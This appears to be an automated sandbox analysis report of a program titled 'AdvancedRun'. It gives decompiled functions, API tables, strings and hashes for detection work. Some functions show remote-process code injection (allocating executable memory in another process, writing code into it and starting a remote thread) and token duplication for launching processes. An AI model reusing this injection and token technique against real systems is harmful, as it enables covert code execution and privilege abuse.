				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

0x0040a474
0x0040a47b
0x0040a48a
0x0040a48d
0x0040a48f
0x0040a497
0x0040a49a
0x0040a6f7
0x0040a6f9
0x0040a700
0x0040a700
0x0040a4ad
0x0040a4b3
0x0040a4b8
0x0040a4c6
0x0040a4cc
0x0040a4cf
0x0040a4dd
0x0040a4e2
0x0040a4e3
0x0040a4ea
0x0040a4e5
0x0040a4e5
0x0040a4e5
0x0040a4ec
0x0040a4f6
0x0040a4fe
0x0040a503
0x0040a504
0x0040a50b
0x0040a506
0x0040a506
0x0040a506
0x0040a50d
0x0040a512
0x0040a518
0x0040a51c
0x0040a523
0x0040a523
0x0040a523
0x0040a528
0x0040a537
0x0040a54c
0x0040a539
0x0040a544
0x0040a549
0x0040a558
0x0040a56d
0x0040a55a
0x0040a565
0x0040a56a
0x0040a579
0x0040a591
0x0040a57b
0x0040a589
0x0040a58e
0x0040a5b4
0x0040a5b7
0x0040a5cc
0x0040a5cf
0x0040a5d4
0x0040a5d7
0x0040a6ed
0x0040a5e5
0x0040a5fa
0x0040a60b
0x0040a61a
0x0040a620
0x0040a623
0x0040a62b
0x0040a62f
0x0040a632
0x0040a659
0x0040a634
0x0040a635
0x0040a641
0x0040a648
0x0040a648
0x0040a668
0x0040a66e
0x0040a685
0x0040a69e
0x0040a6a8
0x0040a6ad
0x0040a6bd
0x0040a6c5
0x0040a6c8
0x0040a6d0
0x0040a6d1
0x0040a6d2
0x0040a6d3
0x0040a6d3
0x0040a6c8
0x0040a6d7
0x0040a6dc
0x0040a6dc
0x0040a6d7
0x00000000

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
memset.MSVCRT ref: 0040A4B3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0

Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1

GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
CloseHandle.KERNEL32(00000000), ref: 0040A648
memset.MSVCRT ref: 0040A66E
ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
FreeLibrary.KERNEL32(?), ref: 0040A6DC
GetLastError.KERNEL32 ref: 0040A6E4
GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1

Strings

CreateProcessW, xrefs: 0040A4DD
kernel32.dll, xrefs: 0040A4BB
GetLastError, xrefs: 0040A4FE
D, xrefs: 0040A528

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
String ID: CreateProcessW$D$GetLastError$kernel32.dll
API String ID: 1572607441-20550370
Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}

0x004028a3
0x004028ab
0x004028bd
0x004028ca
0x004028d7
0x004028e3
0x004028e6
0x004028e8
0x00000000
0x004028eb
0x004028ec

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

Strings

CreateProcessWithTokenW, xrefs: 004028C2
CreateProcessWithLogonW, xrefs: 004028B7
DuplicateTokenEx, xrefs: 004028DB
advapi32.dll, xrefs: 004028A6
OpenProcessToken, xrefs: 004028CF

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-1970996977
Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}

0x0040a27d
0x0040a286
0x0040a290
0x0040a29d
0x00000000
0x0040a32f
0x0040a29f
0x0040a2a4
0x0040a2ad
0x0040a2b6
0x0040a2bc
0x0040a2be
0x0040a2c4
0x0040a2c8
0x0040a2ce
0x0040a2e3
0x0040a2ed
0x0040a2fb
0x0040a2fe
0x0040a305
0x0040a30c
0x0040a30f
0x0040a313
0x00000000
0x0040a31a
0x0040a338

APIs

GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F

Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

$, xrefs: 0040A2E3

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
String ID: $
API String ID: 283512611-3993045852
Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x00401093
0x00401096
0x00401097
0x0040109b
0x004010a3
0x004010a5
0x00401270
0x00401278
0x004012b3
0x0040127a
0x00401293
0x004012a2
0x004012a2
0x004012c1
0x004012d9
0x004012ea
0x004012ec
0x004012f6
0x00000000
0x004010ab
0x004010ab
0x004010ac
0x00401231
0x00401236
0x00401239
0x0040123d
0x00401249
0x00401249
0x0040124c
0x00000000
0x00401252
0x00401259
0x00401265
0x00000000
0x00401265
0x0040123f
0x0040123f
0x00401243
0x00000000
0x00000000
0x00000000
0x00000000
0x00401243
0x004010b2
0x004010b2
0x004010b5
0x004011e1
0x004011e3
0x004011e6
0x0040120e
0x00401216
0x00000000
0x0040121c
0x00401224
0x00401226
0x00401229
0x00000000
0x0040122f
0x00000000
0x0040122f
0x00401229
0x004011e8
0x004011e8
0x004011ed
0x004011fb
0x00401203
0x00401203
0x004010bb
0x004010bb
0x004010c0
0x00401151
0x0040115a
0x00401168
0x0040116b
0x0040116e
0x00401170
0x00401173
0x00401180
0x00401182
0x00401185
0x004011a4
0x004011ac
0x00000000
0x004011b2
0x004011ba
0x004011bc
0x004011c7
0x004011c9
0x004011cb
0x00000000
0x004011d1
0x00000000
0x004011d1
0x004011cb
0x00401187
0x00401187
0x00401199
0x00000000
0x00401199
0x004010c6
0x004010c8
0x004012fd
0x004012fd
0x004012fd
0x004010ce
0x004010ce
0x004010d7
0x004010e5
0x004010e8
0x004010eb
0x004010ed
0x004010f0
0x00401102
0x0040111d
0x00401125
0x00000000
0x0040112b
0x00401133
0x00401135
0x00401140
0x00401142
0x00401144
0x00000000
0x0040114a
0x0040114a
0x00000000
0x0040114a
0x00401144
0x00401104
0x0040110a
0x0040110b
0x0040110b
0x0040110e
0x00401115
0x00401117
0x00401117
0x00401102
0x004010c8
0x004010c0
0x004010b5
0x004010ac
0x00401303

APIs

GetDlgItem.USER32 ref: 004010EB
ChildWindowFromPoint.USER32 ref: 004010FD
GetDlgItem.USER32 ref: 00401133
ChildWindowFromPoint.USER32 ref: 00401140
GetDlgItem.USER32 ref: 0040116E
ChildWindowFromPoint.USER32 ref: 00401180
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401189
LoadCursorW.USER32(00000000,00000067), ref: 00401192
SetCursor.USER32(00000000,?,?), ref: 00401199
GetDlgItem.USER32 ref: 004011BA
ChildWindowFromPoint.USER32 ref: 004011C7
GetDlgItem.USER32 ref: 004011E1
SetBkMode.GDI32(?,00000001), ref: 004011ED
SetTextColor.GDI32(?,00C00000), ref: 004011FB
GetSysColorBrush.USER32(0000000F), ref: 00401203
GetDlgItem.USER32 ref: 00401224
EndDialog.USER32(?,?), ref: 00401259
DeleteObject.GDI32(?), ref: 00401265
GetDlgItem.USER32 ref: 0040128A
ShowWindow.USER32(00000000), ref: 00401293
GetDlgItem.USER32 ref: 0040129F
ShowWindow.USER32(00000000), ref: 004012A2
SetDlgItemTextW.USER32 ref: 004012B3
SetWindowTextW.USER32(?,AdvancedRun), ref: 004012C1
SetDlgItemTextW.USER32 ref: 004012D9
SetDlgItemTextW.USER32 ref: 004012EA

Strings

AdvancedRun, xrefs: 004012B9

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: AdvancedRun
API String ID: 829165378-481304740
Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

0x00408ae3
0x00408aeb
0x00408af3
0x00408b76
0x00408b8a
0x00408b91
0x00408b98
0x00408bb1
0x00408bb3
0x00408bc6
0x00408bcc
0x00408bda
0x00408be0
0x00408bf3
0x00408bfa
0x00408c0b
0x00408c12
0x00408c17
0x00408c1a
0x00408c2c
0x00408c39
0x00408c3d
0x00408c3f
0x00408c41
0x00408c52
0x00408c58
0x00408c58
0x00408c6f
0x00408c71
0x00408c73
0x00408c83
0x00408c89
0x00408c89
0x00408c8a
0x00408c8f
0x00408c91
0x00408c9a
0x00408c93
0x00408c93
0x00408c93
0x00408c9f
0x00408ca5
0x00408caf
0x00408cbc
0x00408cc2
0x00408cc7
0x00408ccd
0x00408cd0
0x00408cd6
0x00408cd7
0x00408cd8
0x00408cde
0x00408ce3
0x00408ceb
0x00408cfe
0x00408d03
0x00408d06
0x00408d0c
0x00408d21
0x00408d27
0x00408d0c
0x00000000
0x00408ca7
0x00408ca7
0x00408cad
0x00408d28
0x00408d2e
0x00408d35
0x00408d36
0x00408d42
0x00408d48
0x00408d4e
0x00408d54
0x00408d5a
0x00408d60
0x00408d66
0x00408d6c
0x00408d72
0x00408d73
0x00408d7f
0x00408d85
0x00408d8a
0x00408d8f
0x00408d90
0x00408da8
0x00408db9
0x00408dbf
0x00408dc5
0x00408dc5
0x00000000
0x00408cad
0x00408ca5
0x00408af6
0x00408afc
0x00408b07
0x00408b2a
0x00408b38
0x00408b53
0x00408b56
0x00408b62
0x00408b6a
0x00408b6a
0x00408b2a
0x00408b07
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00408B20
GetDlgItem.USER32 ref: 00408B38
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
memset.MSVCRT ref: 00408B91
memset.MSVCRT ref: 00408BB3
memset.MSVCRT ref: 00408BCC
memset.MSVCRT ref: 00408BE0
memset.MSVCRT ref: 00408BFA
memset.MSVCRT ref: 00408C12
GetCurrentProcess.KERNEL32 ref: 00408C1A
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
memset.MSVCRT ref: 00408CC2
GetCurrentProcessId.KERNEL32 ref: 00408CD0
memcpy.MSVCRT ref: 00408CFE
wcscpy.MSVCRT ref: 00408D21
_snwprintf.MSVCRT ref: 00408D90
SetDlgItemTextW.USER32 ref: 00408DA8
GetDlgItem.USER32 ref: 00408DB2
SetFocus.USER32(00000000), ref: 00408DB9

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
{Unknown}, xrefs: 00408BA5

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
